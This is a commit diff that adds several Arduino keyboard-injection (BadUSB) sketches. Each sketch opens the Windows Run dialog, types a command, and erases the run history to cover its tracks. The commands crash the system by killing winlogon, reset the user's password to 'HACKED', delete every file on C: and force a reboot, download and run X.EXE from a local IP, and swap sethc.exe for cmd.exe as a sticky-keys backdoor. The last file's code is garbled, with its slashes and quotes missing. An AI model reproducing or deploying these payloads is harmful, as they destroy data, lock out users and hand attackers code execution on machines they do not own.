-
Notifications
You must be signed in to change notification settings - Fork 132
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
8 changed files
with
103 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
void setup() {//初始化 | ||
Keyboard.begin();//开始键盘通讯 | ||
delay(5000);//延时 | ||
Keyboard.press(KEY_LEFT_GUI);//win键 | ||
delay(500); | ||
Keyboard.press('r');//r键 | ||
delay(500); | ||
Keyboard.release(KEY_LEFT_GUI); | ||
Keyboard.release('r'); | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
delay(500); | ||
Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL"); | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
Keyboard.end();//结束键盘通讯 | ||
} | ||
void loop()//循环 | ||
{ | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
void setup() {//初始化 | ||
Keyboard.begin();//开始键盘通讯 | ||
delay(5000);//延时 | ||
Keyboard.press(KEY_LEFT_GUI);//win键 | ||
delay(500); | ||
Keyboard.press('r');//r键 | ||
delay(500); | ||
Keyboard.release(KEY_LEFT_GUI); | ||
Keyboard.release('r'); | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
delay(500); | ||
Keyboard.println("CMD.EXE /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&NET USER %USERNAME% HACKED&EXIT"); | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
Keyboard.end();//结束键盘通讯 | ||
} | ||
void loop()//循环 | ||
{ | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
void setup() {//初始化 | ||
Keyboard.begin();//开始键盘通讯 | ||
delay(5000);//延时 | ||
Keyboard.press(KEY_LEFT_GUI);//win键 | ||
delay(500); | ||
Keyboard.press('r');//r键 | ||
delay(500); | ||
Keyboard.release(KEY_LEFT_GUI); | ||
Keyboard.release('r'); | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
delay(500); | ||
Keyboard.println("CMD /C START /MIN REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F© C:\\WINDOWS\\SYSTEM32\\SHUTDOWN.EXE D:\\SHUTDOWN.EXE /y&DEL /S /F /Q C:\\*&D:\\SHUTDOWN.EXE -R -F -T 0") | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
Keyboard.end();//结束键盘通讯 | ||
} | ||
void loop()//循环 | ||
{ | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
void setup() {//初始化 | ||
Keyboard.begin();//开始键盘通讯 | ||
delay(5000);//延时 | ||
Keyboard.press(KEY_LEFT_GUI);//win键 | ||
delay(500); | ||
Keyboard.press('r');//r键 | ||
delay(500); | ||
Keyboard.release(KEY_LEFT_GUI); | ||
Keyboard.release('r'); | ||
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法 | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
delay(500); | ||
Keyboard.println("CMD /C START /MIN REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN POWERSHELL $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.dOWNLOADfILE('HTTP://192.168.1.103/X.EXE', 'c:\\X.EXE');START c:\\X.EXE;EXIT"); | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
Keyboard.end();//结束键盘通讯 | ||
} | ||
void loop()//循环 | ||
{ | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
void setup() {初始化 | ||
delay(5000);延时 | ||
Keyboard.press(KEY_LEFT_GUI);win键 | ||
delay(500); | ||
Keyboard.press('r');r键 | ||
delay(500); | ||
Keyboard.release(KEY_LEFT_GUI); | ||
Keyboard.release('r'); | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
delay(500); | ||
Keyboard.println(CMD C START MIN REG DELETE hkcusOFTWAREmICROSOFTwINDOWScURRENTvERSIONeXPLORERrUNmru F&TAKEOWN F %sYSTEMrOOT%SYSTEM32SETHC.EXE&ECHO YCACLS %sYSTEMrOOT%SYSTEM32SETHC.EXE g %username%f© CWINDOWSSYSTEM32CMD.EXE CWINDOWSSYSTEM32SETHC.EXE y); | ||
Keyboard.press(KEY_CAPS_LOCK); | ||
Keyboard.release(KEY_CAPS_LOCK); | ||
Keyboard.end();结束键盘通讯 | ||
} | ||
void loop()循环 | ||
{ | ||
} |
File renamed without changes.
File renamed without changes.